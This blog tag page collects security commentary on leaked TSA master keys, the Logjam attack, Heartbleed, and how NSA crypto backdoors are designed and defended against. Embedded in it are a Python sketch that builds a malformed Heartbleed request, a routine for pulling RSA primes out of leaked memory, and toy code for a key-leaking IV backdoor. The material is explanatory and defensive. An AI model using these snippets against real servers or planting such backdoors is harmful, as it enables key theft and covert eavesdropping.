Entries Tagged "keys"

Page 7 of 15

TSA Master Keys

Someone recently noticed a Washington Post story on the TSA that originally contained a detailed photograph of all the TSA master keys. It’s now blurred out of the Washington Post story, but the image is still floating around the Internet. The whole thing neatly illustrates one of the main problems with backdoors, whether in cryptographic systems or physical systems: they’re fragile.

Nicholas Weaver wrote:

TSA “Travel Sentry” luggage locks contain a disclosed backdoor which is similar in spirit to what Director Comey desires for encrypted phones. In theory, only the Transportation Security Administration or other screeners should be able to open a TSA lock using one of their master keys. All others, notably baggage handlers and hotel staff, should be unable to surreptitiously open these locks.

Unfortunately for everyone, a TSA agent and the Washington Post revealed the secret. All it takes to duplicate a physical key is a photograph, since it is the pattern of the teeth, not the key itself, that tells you how to open the lock. So by simply including a pretty picture of the complete spread of TSA keys in the Washington Post’s paean to the TSA, the Washington Post enabled anyone to make their own TSA keys.

So the TSA backdoor has failed: we must assume any adversary can open any TSA “lock”. If you want to at least know your luggage has been tampered with, forget the TSA lock and use a zip-tie or tamper-evident seal instead, or attach a real lock and force the TSA to use their bolt cutters.

It’s the third photo on this page, reproduced here. There’s also this set of photos. Get your copy now, in case they disappear.

Reddit thread. BoingBoing post. Engadget article.

EDITED TO ADD (9/10): Someone has published a set of CAD files so you can make your own master keys.

Posted on September 8, 2015 at 6:02 AM

The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve—the most efficient algorithm for breaking a Diffie-Hellman connection—is dependent only on this prime. After this first step, an attacker can quickly break individual connections.
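To make the shared-parameter problem concrete, here is a toy sketch of finite-field Diffie-Hellman as used in DHE cipher suites. The prime below is a small stand-in chosen only so the example runs (real export-grade groups used 512-bit primes shared across huge numbers of servers), and the helper name is invented for illustration. The point is that the per-connection exponents are fresh, but the expensive number-field-sieve work depends only on the prime.

```python
import secrets

# Toy sketch of finite-field Diffie-Hellman (DHE). The group parameters
# (p, g) are public and, in practice, were shared by millions of servers;
# only the secret exponents below change from connection to connection.
p = 2**127 - 1   # small stand-in prime; real export groups were 512 bits
g = 5

def dh_keypair():
    """Fresh per-connection secret exponent and corresponding public value."""
    secret = secrets.randbelow(p - 2) + 1
    return secret, pow(g, secret, p)

a_secret, a_public = dh_keypair()   # client
b_secret, b_public = dh_keypair()   # server

# Both sides derive the same shared secret from the other's public value.
assert pow(b_public, a_secret, p) == pow(a_public, b_secret, p)

# The catch: the dominant cost of the number field sieve depends only on p.
# An attacker who does that precomputation once for a widely shared p can
# then break individual connections using that p relatively quickly.
```

The corresponding defense is straightforward in principle: use much larger, preferably freshly generated primes, or move to elliptic-curve Diffie-Hellman, where no comparable per-group precomputation attack is known.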

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”

[…]

The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation—just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

EDITED TO ADD: The DH precomputation easily lends itself to custom ASIC design, and is something that pipelines easily. Using Bitcoin mining hardware as a rough comparison, this means a couple of orders of magnitude speedup.

EDITED TO ADD (5/23): Good analysis of the cryptography.

EDITED TO ADD (5/24): Good explanation by Matthew Green.

Posted on May 21, 2015 at 6:30 AM

Subconscious Keys

I missed this paper when it was first published in 2012:

“Neuroscience Meets Cryptography: Designing Crypto Primitives Secure Against Rubber Hose Attacks”

Abstract: Cryptographic systems often rely on the secrecy of cryptographic keys given to users. Many schemes, however, cannot resist coercion attacks where the user is forcibly asked by an attacker to reveal the key. These attacks, known as rubber hose cryptanalysis, are often the easiest way to defeat cryptography. We present a defense against coercion attacks using the concept of implicit learning from cognitive psychology. Implicit learning refers to learning of patterns without any conscious knowledge of the learned pattern. We use a carefully crafted computer game to plant a secret password in the participant’s brain without the participant having any conscious knowledge of the trained password. While the planted secret can be used for authentication, the participant cannot be coerced into revealing it since he or she has no conscious knowledge of it. We performed a number of user studies using Amazon’s Mechanical Turk to verify that participants can successfully re-authenticate over time and that they are unable to reconstruct or even recognize short fragments of the planted secret.

Posted on January 28, 2015 at 6:39 AM

More on Heartbleed

This is an update to my earlier post.

Cloudflare is reporting that it’s very difficult, if not practically impossible, to steal SSL private keys with this attack.

Here’s the good news: after extensive testing on our software stack, we have been unable to successfully use Heartbleed on a vulnerable server to retrieve any private key data. Note that is not the same as saying it is impossible to use Heartbleed to get private keys. We do not yet feel comfortable saying that. However, if it is possible, it is at a minimum very hard. And, we have reason to believe based on the data structures used by OpenSSL and the modified version of NGINX that we use, that it may in fact be impossible.

The reasoning is complicated, and I suggest people read the post. What I have heard from people who actually ran the attack against various servers is that what you get is a huge variety of cruft, ranging from indecipherable binary to useless log messages to people’s passwords. The variability is huge.
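For those wondering how private keys were eventually pulled out of that cruft: the successful demonstrations looked for the RSA primes themselves rather than a complete key structure. The sketch below illustrates the idea and is not a tested tool; it assumes you already have a leaked memory chunk and the server's public modulus, assumes the little-endian in-memory byte order typical of OpenSSL bignums on x86, and uses an invented helper name.

```python
def find_prime_factor(dump: bytes, n: int, prime_bytes: int = 128):
    """Scan a leaked memory dump for a prime factor of the RSA modulus n.

    OpenSSL keeps the secret primes p and q in memory, so slide a window
    over the dump, interpret each window as an integer, and test whether
    it divides n. prime_bytes=128 suits a 2048-bit modulus.
    """
    for offset in range(len(dump) - prime_bytes + 1):
        candidate = int.from_bytes(dump[offset:offset + prime_bytes], "little")
        if candidate > 1 and candidate % 2 == 1 and n % candidate == 0:
            return offset, candidate   # found p or q; the private key follows
    return None

# Usage: find_prime_factor(leaked_chunk, server_public_modulus)
# A 64 KB leak means only ~65,000 cheap divisibility tests per chunk.
```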

This xkcd comic is a very good explanation of how the vulnerability works. And this post by Dan Kaminsky is worth reading.

I have a lot to say about the human aspects of this: auditing of open-source code, how the responsible disclosure process worked in this case, the ease with which anyone could weaponize this with just a few lines of script, how we explain vulnerabilities to the public—and the role that impressive logo played in the process—and our certificate issuance and revocation process. This may be a massive computer vulnerability, but all of the interesting aspects of it are human.

EDITED TO ADD (4/12): We have one example of someone successfully retrieving an SSL private key using Heartbleed. So it’s possible, but it seems to be much harder than we originally thought.

And we have a story where two anonymous sources have claimed that the NSA has been exploiting Heartbleed for two years.

EDITED TO ADD (4/12): Hijacking user sessions with Heartbleed. And a nice essay on the marketing and communications around the vulnerability.

EDITED TO ADD (4/13): The US intelligence community has denied prior knowledge of Heartbleed. The statement is word-game free:

NSA was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private sector cybersecurity report. Reports that say otherwise are wrong.

The statement also says:

Unless there is a clear national security or law enforcement need, this process is biased toward responsibly disclosing such vulnerabilities.

Since when is “law enforcement need” included in that decision process? This national security exception to law and process is extending much too far into normal police work.

Another point. According to the original Bloomberg article:

http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html

Certainly a plausible statement. But if those millions didn’t discover something obvious like Heartbleed, shouldn’t we investigate them for incompetence?

Finally—not related to the NSA—this is good information on which sites are still vulnerable, including historical data.

Posted on April 11, 2014 at 1:10 PM

Heartbleed

Heartbleed is a catastrophic bug in OpenSSL:

The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.

Basically, an attacker can grab 64K of memory from a server. The attack leaves no trace, and can be done multiple times to grab a different random 64K of memory. This means that anything in memory—SSL private keys, user keys, anything—is vulnerable. And you have to assume that it is all compromised. All of it.
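For the technically curious, here is a rough sketch of the malicious request, following the heartbeat message layout in RFC 6520. It illustrates the missing bounds check rather than serving as an exploit tool: the client claims a 64 KB payload while actually sending one byte.

```python
import struct

# Rough sketch of a malicious TLS heartbeat request (layout per RFC 6520).
# The client claims a 0xFFFF-byte payload while sending a single byte; a
# vulnerable server echoes back 0xFFFF bytes, the rest coming from whatever
# happened to sit next to that byte in its memory.

claimed_length = 0xFFFF              # what we say the payload is
actual_payload = b"A"                # what we actually send (no padding)

heartbeat_msg = (
    struct.pack("!B", 1)                      # HeartbeatMessageType: request
    + struct.pack("!H", claimed_length)       # payload_length -- the lie
    + actual_payload
)

tls_record = (
    struct.pack("!B", 24)                     # ContentType 24: heartbeat
    + b"\x03\x02"                             # record version: TLS 1.1
    + struct.pack("!H", len(heartbeat_msg))   # record length (truthful)
    + heartbeat_msg
)

# The fix in OpenSSL 1.0.1g: silently drop any heartbeat whose claimed
# payload_length does not fit inside the record that actually arrived.
```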

“Catastrophic” is the right word. On the scale of 1 to 10, this is an 11.

Half a million sites are vulnerable, including my own. Test your vulnerability here.

The bug has been patched. After you patch your systems, you have to get a new public/private key pair, update your SSL certificate, and then change every password that could potentially be affected.

At this point, the probability is close to one that every target has had its private keys extracted by multiple intelligence agencies. The real question is whether or not someone deliberately inserted this bug into OpenSSL, and has had two years of unfettered access to everything. My guess is accident, but I have no proof.

This article is worth reading. The Hacker News thread is filled with commentary. XKCD cartoon.

EDITED TO ADD (4/9): Has anyone looked at all the low-margin non-upgradable embedded systems that use OpenSSL? An upgrade path that involves the trash, a visit to Best Buy, and a credit card isn’t going to be fun for anyone.

EDITED TO ADD (4/10): I’m hearing that the CAs are completely clogged, trying to reissue so many new certificates. And I’m not sure we have anything close to the infrastructure necessary to revoke half a million certificates.

Possible evidence that Heartbleed was exploited last year.

EDITED TO ADD (4/10): I wonder if there is going to be some backlash from the mainstream press and the public. If nothing really bad happens—if this turns out to be something like the Y2K bug—then we are going to face criticisms of crying wolf.

EDITED TO ADD (4/11): Brian Krebs and Ed Felten on how to protect yourself from Heartbleed.

Posted on April 9, 2014 at 5:03 AM

"Unbreakable" Encryption Almost Certainly Isn't

This headline is provocative: “Human biology inspires ‘unbreakable’ encryption.”

The article is similarly nonsensical:

Researchers at Lancaster University, UK have taken a hint from the way the human lungs and heart constantly communicate with each other, to devise an innovative, highly flexible encryption algorithm that they claim can’t be broken using the traditional methods of cyberattack.

Information can be encrypted with an array of different algorithms, but the question of which method is the most secure is far from trivial. Such algorithms need a “key” to encrypt and decrypt information; the algorithms typically generate their keys using a well-known set of rules that can only admit a very large, but nonetheless finite number of possible keys. This means that in principle, given enough time and computing power, prying eyes can always break the code eventually.

The researchers, led by Dr. Tomislav Stankovski, created an encryption mechanism that can generate a truly unlimited number of keys, which they say vastly increases the security of the communication. To do so, they took inspiration from the anatomy of the human body.

Regularly, someone from outside cryptography—who has no idea how crypto works—pops up and says “hey, I can solve their problems.” Invariably, they make some trivial encryption scheme because they don’t know better.

Remember: anyone can create a cryptosystem that he himself cannot break. And this advice from 15 years ago is still relevant.

Another article, and the paper.

Posted on April 8, 2014 at 6:16 AM

Tor Appliance

Safeplug is an easy-to-use Tor appliance. I like that it can also act as a Tor exit node.

EDITED TO ADD: I know nothing about this appliance, nor do I endorse it. In fact, I would like it to be independently audited before we start trusting it. But it’s a fascinating proof-of-concept of encapsulating security so that normal Internet users can use it.

Posted on November 27, 2013 at 6:28 AM

Defending Against Crypto Backdoors

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.
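A toy sketch of the general idea follows. This is not the real Clipper/Skipjack message format (the actual LEAF also carried a device identifier and a checksum, wrapped under a family key), and XOR stands in for real encryption purely to keep the sketch self-contained; the names are invented for illustration. The essential move is that the per-call session key travels with the call, wrapped under a key the escrow agent holds.

```python
import secrets

# Toy sketch of the LEAF concept -- NOT the real Clipper/Skipjack format.
# XOR stands in for real encryption so the example is self-contained.
def xor(data: bytes, key: bytes) -> bytes:
    return bytes(d ^ k for d, k in zip(data, key))

escrow_key = secrets.token_bytes(16)     # held by the escrow agent (the FBI)
session_key = secrets.token_bytes(16)    # fresh key for this phone call

leaf = xor(session_key, escrow_key)      # Law Enforcement Access Field
call = xor(b"hello, secure phone", session_key + session_key)

# What travels over the wire: the encrypted call plus the LEAF.
# An eavesdropper holding the escrow key unwraps the LEAF...
recovered = xor(leaf, escrow_key)
# ...and decrypts the call. Anyone else who obtains the escrow key gains
# exactly the same capability -- the fragility of this kind of backdoor.
assert xor(call, recovered + recovered) == b"hello, secure phone"
```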

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it’s pretty much impossible to guarantee that a complex piece of software isn’t leaking secret information. We know from Ken Thompson’s famous talk on “trusting trust” (first delivered in the ACM Turing Award Lectures) that you can never be totally sure if there’s a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don’t know. Microsoft’s _NSAKEY looks like a smoking gun, but honestly, we don’t know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker—from the lowliest script kiddie up to the NSA—spies on our computers, it’s too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

  • Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn’t affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector); see the sketch after this list.
  • High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a “mistyped” constant. Or “accidentally” reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don’t believe the DUAL_EC_DRBG backdoor is real: they’re both too obvious.
  • Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That’s why the recently described potential vulnerability in Intel’s random number generator worries me so much; one person could make this change during mask generation, and no one else would know.
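Here is the IV trick from the first bullet as a toy sketch. It is hypothetical, modeled on known kleptographic techniques rather than any identified product, and all the names are invented for illustration: the “random” IV is really the first half of the session key masked with a constant baked into the backdoored build, so traffic looks normal to everyone except whoever holds the mask.

```python
import secrets

# Toy sketch of a "leak key bits in a public IV" backdoor (hypothetical).
ATTACKER_MASK = secrets.token_bytes(16)     # baked into the backdoored build

def backdoored_iv(session_key: bytes) -> bytes:
    """Looks like a random 16-byte IV, but encodes the first 16 key bytes."""
    return bytes(k ^ m for k, m in zip(session_key[:16], ATTACKER_MASK))

def attacker_recovers_key_bits(iv: bytes) -> bytes:
    """Anyone holding the mask inverts the IV back into key bytes."""
    return bytes(i ^ m for i, m in zip(iv, ATTACKER_MASK))

session_key = secrets.token_bytes(32)
iv = backdoored_iv(session_key)             # transmitted in the clear
assert attacker_recovers_key_bits(iv) == session_key[:16]
```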

These characteristics imply several things:

  • A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.
  • If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.
  • A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA’s requests.
  • Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don’t really understand security.
  • Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information—recall the LEAF—and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I’m sure there are more; this list isn’t meant to be exhaustive, nor the final word on the topic. It’s simply a starting place for discussion. But it won’t work unless customers start demanding software with this sort of transparency.

  • Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It’s true we won’t know for sure if the code we’re seeing is the code that’s actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.
  • The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.
  • There should be no master secrets. These are just too vulnerable.
  • All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.
  • Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key or public predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information.

This is a hard problem. We don’t have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater “attack surface” for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it’s supposed to do and nothing more. Unfortunately, we’re terrible at this. Even worse, there’s not a lot of practical research in this area—and it’s hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn’t just about the NSA, and legal controls won’t protect against those who don’t follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.

EDITED TO ADD: I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.

Posted on October 22, 2013 at 6:15 AM

